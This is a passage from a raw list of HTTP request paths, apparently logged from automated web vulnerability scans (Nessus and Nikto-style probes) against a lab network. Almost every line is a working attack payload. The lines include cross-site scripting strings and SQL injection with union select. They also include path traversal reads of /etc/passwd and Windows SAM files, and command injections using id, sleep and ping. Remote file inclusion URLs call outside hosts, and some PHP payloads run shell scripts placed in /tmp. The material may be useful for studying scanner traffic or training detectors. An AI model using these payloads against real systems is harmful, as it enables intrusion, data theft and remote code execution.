src=\"javascript:alert(cross_site_scripting.nasl);\">\n/chattranscripts/\n/help.php?q=&ver\\x0b>q84637493&rem\\x0b\n/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/scripts/index.php?id='union/**/select/**/0,0,1975243928,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/hjdzm96v.html?<script>document.cookie=\"testbyqe=7474;\"</script>\n/javascript/evil.exe\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='55723961\n/6qbynt4f.mscgi?<script>cross_site_scripting.nasl</script>\n/newsubscription/\n/main.php?stuff=\"&sleep 8 #\n/en-us/ddoworrl.fts?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/help.php?q=\"&ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/help.php?q=\"\\x0asleep\\x098\\x09#\n/r3le3om5.exe?<script>cross_site_scripting.nasl</script>\n/cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/en-us/ddoworrl.x?<script>document.cookie=\"testvlau=8517;\"</script>\n/examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/yef5f3d5.cfm?<script>document.cookie=\"testcrcv=6167;\"</script>\n/manager/sgdynamo.exe?htname=sgdynamo.exe\n/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>\n/hrttz9fj.cgi?<script>document.cookie=\"testtbjy=7334;\"</script>\n/new_script-1/\n/9o6g5vkn.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/w4996nr0.cfc?<script>document.cookie=\"testttvs=7163;\"</script>\n/eei78ore.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vjbrrppi.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ver&rem \n/main.php?logout='|sleep\\x098\\x09#\n/index.php?op=default&date=200607' union select 1,1520713154,1,1,1,1,1,1,1,1--&blogid=1\n/subscriptions.bat\n/cacti/cart32.exe\n/main.php?stuff=\\x0auname >q63217252 #\n/en-us/33y9gcqq.fts?<script>document.cookie=\"testnvxc=4301;\"</script>\n/channeldescript/\n/main.php?stuff='del q73795897 #\n/a0imiuf1.html?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/cgi-bin/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/javascript/fusion.exe\n/templates/prescription\n/addressbook.php?\\\"><script>alert(vulnerable)</script><!--\n/scripts/editor/efront_init_tiny_mce.php\n/scripts/qop0sa1auif9.pl\n/tukodz3j.php?<script>cross_site_scripting.nasl</script>\n/p043snfr.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/edit.jsp?page=user&editor=../../../install\n/xsqln7eb.cfm?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/swgnhpydbq0t?\n/nmw0do67.aspx?<script>cross_site_scripting.nasl</script>\n/cacti/sgdynamo.exe?htname=sgdynamo.exe\n/idnsubscription/\n/main.php?stuff=ver\\x09>q17388188&rem\\x09\n/examples/jsp/jsp2/jspx/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/oie504mr.cfm?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/help.php?q=\"&rm\\x09q44432678\\x09#\n/help.php?q=\"\\x0adel\\x09q72938489\\x09#\n/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls\n/cgi-bin/index.php?show=/etc/passwd\n/main.php?logout=&del;q28829334&rem;\n/javascript/download.exe\n/qb2xy9aw.nsf?<script>cross_site_scripting.nasl</script>\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/scripts/zq9frlz6fcfp.html\n/ny1b3qq4.php3?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"rm\\x09q75241669&rem\\x09\n/examples/jsp/num/index.php?cat='\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,1246967071--\n/htaccess/dohtaccess.html?dir=><script>alert(413025588065)</script>\n/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/agent_affil.pl?login=<script>alert(\"414256083569\");</script>\n/cgi-bin/search.jsp?q=%\"<script>alert(1331922090)</script>\n/recordings/index.php?page=/etc/passwd\\x00\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../vtigerservice.php\\x00\n/1r8cfrlf.kspx?<script>document.cookie=\"testydan=5106;\"</script>\n/scripts/2sfdqydfaknx.inc\n/swingin' thing-keep on swingin' (2005)/\n/jdx255ea.asp?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/l752x1ry.aspx?<script>cross_site_scripting.nasl</script>\n/cgi-bin/webfind.exe?keywords=01234567890123456789\n/javascript/htpasswd.dat\n/examples/jsp/num/survey.inc.php?path=/etc/passwd\\x00\n/scripts/search=<script>alert('xss')</script>\n/<script>document.cookie=\"testtbjy=7334;\"</script>\n/jdx255ea.htm?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/o1zj4u9v.dll?<script>document.cookie=\"testabrn=6368;\"</script>\n/dxdiag.exe/\n/escript_src/\n/6n7aacgg.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hrttz9fj.fts?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/what's new b400p/\n/phpmyadmin/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/examples/jsp/num/webdist.cgi?distloc=;id\n/8t9v8k7x.idc?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/ydexw8by.nsf?<script>document.cookie=\"testulex=4996;\"</script>\n/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd\n/scripts/bpk_bsfe_4vq.cfm\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/fetpkvinrp.sh').\"]=1\n/cgi-bin/www/delivery/ac.php?bannerid=-1332010390+or+1=1+--+';passthru(base64_decode($_server[http_nessus_yjp44tu3]));die;/*\n/examples/jsp/error/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/../../../../../../windows/repair/sam\n/g8nu2yy7.pl?<script>cross_site_scripting.nasl</script>\n<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0drm\\x09q21461883\\x09#\n//q99252119&q8892\"q8892<q8892>q99252119\n/scripts/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/j2kdmfw4.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?id=vqqq98hjfy'\n/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/num/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/help.php?q=';sleep\\x097\\x09#\n/scripts/ui/login?user=nessus-1332008314\n/m4kkjf8l.asp?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/search.php?config[\\\"sipssys\\\"]=http://cirt.net/rfiinc.txt?\n/examples/jsp/sessions/source?v=../../../../../../../../../../etc/passwd\\x00\n/en-us/n9xlumt5.jspa?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=\\;id\n/scripts/nffhikq061nq.inc\n/main.php?stuff=\"rm\\x09q23164795&rem\\x09\n/fpnpp5zg.kspx?<meta http-equiv=set-cookie content=\"testyias=101\">\n/xfkun1ku.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/7o5qp766.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/phpmyadmin/../copy of phpmyadmin\n/examples/jsp/checkbox/mylog.html?screen=/etc/passwd\n/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/zz5thkvtmlgl??\n/manager/starnet/addons/slideshow_full.php?album_name='216039046\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/frznctvhi0i5?\n/modules/submit/index.php?op=pre&title=<script>alert(document.cookie);</script>\n/help.php?q=\"\\x0dsleep\\x099\\x09#\n/modules.php?name=web_links&l_op=viewlinkcomments&lid=2pp'/**/union/**/select/**/'412666083482'/*\n/examples/jsp/num/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/javascript/.htpasswd.sfish/2147483647\n/examples/jsp/num/pfdispaly?../../../../../../etc/passwd\n/javascript/.htpasswd.sfish/-0000012345\n/uvazfs7p.fts?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/help.php?q=\"ver >q77224434&rem \n/ygkjkngd.exe?<script>document.cookie=\"testnago=4518;\"</script>\n/examples/jsp/jsp2/el/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/en-us/9kr0ih0v.php?<script>document.cookie=\"testzgnm=1183;\"</script>\n/phpinfo.php?variable=<script>alert('vulnerable')</script>\n/index.php?vo=\\\"><script>alert(document.cookie);</script>\n/bn857frh.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/examples/jsp/jsp2/jspx/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/examples/jsp/checkbox/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/en-us/account/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/starnet/addons/slideshow_full.php?album_name='1740425951\n/javascript/s.exe\n/cacti/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/en-us/esmozg5d.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/5qnlm5z2.do?<script>document.cookie=\"testsixi=8451;\"</script>\n/lmw4r201.php3?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/m5103snj.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/faq.php?action=&type=view&s=&id=-1' union select 0,6982,0,0,0,0,0--\n/aj3pf49c.x?<script>document.cookie=\"testnofv=4170;\"</script>\n/iv5vkgam.dll?<script>document.cookie=\"testfosd=94;\"</script>\n/main.php?logout=ver\\x09>q57458846&rem\\x09\n/scripts/bpk_bsfe_4vq.shtml\n/en-us/account/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/t7tm4m0b.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/marketing.exe\n/phpnuke/modules.php?name=network_tools&file=index&func=ping_host&hinput=;id\n/qb2xy9aw.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripting news sites/\n/r3le3om5.cgi?<script>cross_site_scripting.nasl</script>\n/manager/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- \n/ap58k3ci.fts?<script>cross_site_scripting.nasl</script>\n/main.php?logout='|sleep\\x097\\x09#\n/examples/jsp/error/docs.php?doc=../jpgraph-1.12.1/docs/index\n/initialisation_scripts/\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 603119521--\n/phpmyadmin/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/h21y8w52.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/docs.php?doc=../jpgraph-1.12.1/docs/index\n/phpinfoxss/\n/fc9t54l7.exe?<script>document.cookie=\"testggad=2000;\"</script>\n/scripts/index.php?id='union/**/select/**/0,0,1700684154,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/sessions/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/javascript/g.exe\n/main.php?stuff=;uname #\n/top.php?stuff='&uname\\x09>q76524279\\x09#\n/javascript/document.sh\n/examples/jsp/cal/snpfiltered.pl?t=c&u=<script>foo</script>\n/soundcheck_script/\n/igtf0zon.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ping -w 8000 -n 1 1.2.3.4&rem \n/examples/jsp/num/index.cfm?fuseaction=category.display&category_id='\n/scripts/qcvjnagy16kc.sh\n/javascript/main.exe\n/javascript/status.exe\n/pbserver/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/phpmyadmin/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/help.php?q='&rm\\x09q13548493\\x09#\n/javascript/exe.exe\n/copatranscript_20061114/\n/examples/jsp/error/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/wasdscripts172-axp/\n/bl8sefdm.idc?<script>cross_site_scripting.nasl</script>\n/7u1pb2xi.asp?<script>document.cookie=\"testlwwz=718;\"</script>\n/um7xpn15.htm?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/start_subscription/\n/examples/jsp/jsp2/jspx/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/examples/jsp/error/forumdisplay.php?fid=21\"><script>x</script>\n/examples/jsp/jsp2/jspx/texis.exe/?-dump\n/cgi-bin/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wjflxwdb]));die;/*\n/javascript/yml.exe\n/dda2qr7j.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zroo33l4.html?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/examples/jsp/checkbox/htsearch?exclude=`/etc/passwd`\n/main.php?logout=ver,>q52423344&rem,\n/script/init/createallimagecache.php?path_to_code=http://cirt.net/rfiinc.txt?\n/7dbjwpw6.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9kr0ih0v.nsf?<script>document.cookie=\"testzgnm=1183;\"</script>\n/jnv890lt.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/iktok2bw.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/bn857frh.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/ovlaunch.exe\n<script>document.cookie=\"testbgqj=6434;\"</script>\n/javascript/showjobs.exe\n/top.php?stuff=\"del\\x09q12423295&rem\\x09\n/cacti/index.php?id=mumrj3sj0o'\n/l752x1ry.cfc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/scripts/h3d1n9eaqxv3.pl\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8?\n/pbserver/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cgiscripts/\n/?<script>document.cookie=\"testpokn=7494;\"</script>\n/examples/jsp/num/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/recordings/topic.php?tid='select\n/cgi-home/ion-p?page=../../../../../etc/passwd\n/cgi-bin/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cgi-bin/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/1r8cfrlf.exe?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/jackrabbit/search.jsp?q=%\"<script>alert(1331922090)</script>\n/phpmyadmin/texis.exe/?-dump\n/ovcgi/ovwebhelp.exe\n/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/javascript/htpasswd.csproj\n/examples/jsp/colors/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/descriptive/\n/manager/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/606wkcop.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/if69ddo1.jspa?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/descriptor/\n/odzk29aa.aspx?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/index.php?op=default&date=200607' union select 1,194160379,1,1,1,1,1,1,1,1--&blogid=1\n/main.php?logout=\"ver\\x0b>q77294234&rem\\x0b\n/phpmyadmin/mlog.html?screen=/etc/passwd\n/m2fpztty.php?<script>cross_site_scripting.nasl</script>\n/en-us/account/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331908707\n/manager/snpfiltered.pl?t=c&u=<script>foo</script>\n/javascript/bean.exe\n/exchange/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/_vti_bin.exe\n/j4rdyhw8.html?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/?<script>document.cookie=\"testnofv=4170;\"</script>\n/l4fz1dqw.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/nslookup.cgi?query=localhost;id&type=any&ns=\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/nmw0do67.exe?<script>cross_site_scripting.nasl</script>\n/scripts/forum.php\n/vwmg565s.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/document.part\n/cgi-perl/ion-p.exe?page=c:\\winnt\\repair\\sam\n/javascript/nets.exe\n/en-us/account/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--\n/javascript/esales.exe\n/examples/jsp/colors/shopaddtocart.asp?productid='42\n/main.php?logout=\"&rm\\x09q62572113&rem\\x09\n/u95h6ymu.php3?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/blshscript-outline/\n/recordings/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/whoisscriptpro/\n/javascript/sso.exe\n/scripts/search.jsp?q=%\"<script>alert(1331918998)</script>\n/main.php?stuff=\"&rm;q41942739&rem;\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=q47292667&scr_height=&scr_width=\n/examples/servlets/servlet/index.php?entry='\n/add_script/\n/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/2aibfaczmac8?\n/main.php?logout=\"|ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/byrg33fw.nsf?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/main.php?logout=\"\\x0duname >q33212666 #\n/b5xdqgz2.html?<script>cross_site_scripting.nasl</script>\n/de3v2dd9.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h4bi26jd.kspx?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/main.php?stuff=';del\\x09q19963916\\x09#\n/en-us/ddoworrl.aspx?<script>document.cookie=\"testvlau=8517;\"</script>\n/psynch/nph-psa.exe?css=http://192.168.202.118:8080/2aibfaczmac8?\n/setup.exe?<script>alert('vulnerable')</script>&page=list_users&user=p\n/fpnpp5zg.jspa?<script>document.cookie=\"testyias=101;\"</script>\n<script>document.cookie=\"testziyq=5055;\"</script>\n/p043snfr.aspx?<script>cross_site_scripting.nasl</script>\n/en-us/<script>cross_site_scripting.nasl</script>.exe\n/cacti/file.php?path=/etc/passwd\\x00\n/n1afe1y6.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/index.php?p='nessus\n/modules.php?op=modload&name=news&file=index&catid=&topic=><script>alert('vulnerable');</script>;\n/cgi-bin/calendar/calendar_admin.pl?config=|cat /etc/passwd|\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+ver+>>esbq\n/scripts/n4p4f4gtbhia.php3\n/jw64yq8u.jsp?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/scripts/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/top.php?stuff=\"&rm q51692947&rem \n/recordings/detail.asp?nchannel='1\n/examples/jsp/num/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/gvx7m5ti.pl?<script>document.cookie=\"testwldz=3506;\"</script>\n/dda2qr7j.cfc?<script>cross_site_scripting.nasl</script>\n/cacti/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd\n?username=\"<script>foo</script\n/main.php?stuff=ver >q13167384&rem \n/g8nu2yy7.htm?<script>cross_site_scripting.nasl</script>\n/manager/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/modules.php?op=modload&name=news&file=article&sid=<script>alert('vulnerable');</script+>\n/jdx255ea.fts?<script>document.cookie=\"testziyq=5055;\"</script>\n/?<script>document.cookie=\"testswjp=6010;\"</script>\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,590047445150,4,5,6,7,8,9,10,11--\n/azcrfs8d.php3?<script>document.cookie=\"testjpdr=9205;\"</script>\n/top.php?stuff='&rm\\x09q47253924\\x09#\n/0w155a7c.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/xlj7h65o.kspx?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/2 girls with dildo's 1/\n/main.php?stuff=\"&sleep 10 #\n/examples/jsp/colors/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/cacti/admin/admin.php?sid=0'\n/scripts/vvh_tajyleqq.php\n/s7qus4g3.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/starnet/addons/slideshow_full.php?album_name='1330537294\n/cacti/htgrep/file=index.html&hdr=/etc/passwd\n/scripts/wgate/!?~urlmime=\"><script>alert(\"sap_its_urlmime_xss.nasl\")</script><img src=\"\n/scripts/pssdseehtgdp.cfm\n/examples/jsp/num/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/etfvyyifyy.sh+>+/dev/null+&'); function v\n/iv5vkgam.html?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/?<script>document.cookie=\"testchuc=2100;\"</script>\n/en-us/esmozg5d.htm?<script>cross_site_scripting.nasl</script>\n/demo/ms-pe02/catalog.php?cid=0&main=@rfiurl&pagenumber=1&sid='\"&sortfield=title&sortorder=asc\n/examples/jsp/sessions/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/javascript/checks.exe\n/en-us/7o5qp766.x?<script>cross_site_scripting.nasl</script>\n/cacti/lang/index.php?file=/etc/passwd\n/rpxyx07v.x?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/scripts/u7m5ok8eqpfy.html\n/help.php?q=\"uname >q66737251 #\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/yrxsovftek;\"\n/vhzmaia2.pl?<script>document.cookie=\"testkogj=3979;\"</script>\n/e9rx3ya4.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.phtml?mode=view&album=`id`&pic=a=10.jpg&dispsize=640&start=0\n/myspacewormnewxss/\n/subscriptions.aspx\n//<body><script src=http://www.example.com/test?rnd=q93456121></script>\n/e9rx3ya4.php3?<script>cross_site_scripting.nasl</script>\n/citrix/accessplatform/auth/clientscripts/\n/examples/jsp/error/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/examples/jsp/sessions/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/vjbrrppi.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/b0j2ijssh6cu.shtml\n/en-us/ddoworrl.aspx?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/u95h6ymu.jspa?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/login.asp?sessionid=[\">><script>alert(\"414425594704\");</script>\n/examples/jsp/sessions/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/examples/jsp/error/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/cacti/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/j4drbkil.idc?<script>cross_site_scripting.nasl</script>\n/qb2xy9aw.asp?<script>cross_site_scripting.nasl</script>\n/o35zot2r.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/ssn.exe\n/recordings/rot13sj.cgi?/etc/passwd\n/edv3mapy.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/cwmail.exe\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/frznctvhi0i5?\n/igtf0zon.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gvx7m5ti.idc?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/cacti/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/6qbynt4f.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0ddel\\x09q97796724\\x09#\n/scripts/wx4z4gedhl0l.sh\n/phpmyadmin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/fnwhrxyd.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/recordings/store.php?crn=42'&action=show&show_products_mode=cat_click\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'--\n/cgi/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/javascript/pg.exe\n/cgi-perl/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/examples/jsp/jsp2/jspx/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/main.php?stuff=ping;-w;9000;-n;1;4.3.2.1&rem;\n/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/examples/jsp/num/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/recordings/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/main.php?stuff=ping;-w;10000;-n;1;1.2.3.4&rem;\n/gvx7m5ti.htm?<script>document.cookie=\"testwldz=3506;\"</script>\n/cacti/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/archive.php?scriptpath=@rfiurl?scriptpath=@rfiurl?\n/javascript/forum2.exe\n/lmw4r201.cfm?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/main.php?logout=\"del\\xa0q91628118&rem\\xa0\n/index.php?app=core&module=global&section=register/register/page__section__../../../../../cache/installer_lock__\n/subscriptions.err\n/scripts/fgos1sb1c1tr.html\n/javascript/o.exe\n/script_march06/\n/nmw0do67.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/album.exe\n/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/top.php?stuff=\"&ping,-w,10000,-n,1,4.3.2.1&rem,\n/examples/jsp/jsp2/jspx/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/help.php?q=\"&uname >q11415113 #\n/top.php?stuff=;uname >q61859553 #\n/examples/jsp/checkbox/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/vmi8bb12.pl?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/examples/servlets/servlet/doc/index.php?s=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/top.php?stuff=\"&ping;-w;11000;-n;1;4.3.2.1&rem;\n/examples/jsp/num/showcat.php?cat=1'\n/en-us/<script>cross_site_scripting.nasl</script>.idc\n/cgibin/gwweb.exe?help=bad-request\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+72+65+68+45+78+69+74+54+56+ff+d7+ff+d0+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq\n/iktok2bw.fts?<script>cross_site_scripting.nasl</script>\n/qhvu0pdg.aspx?<meta http-equiv=set-cookie 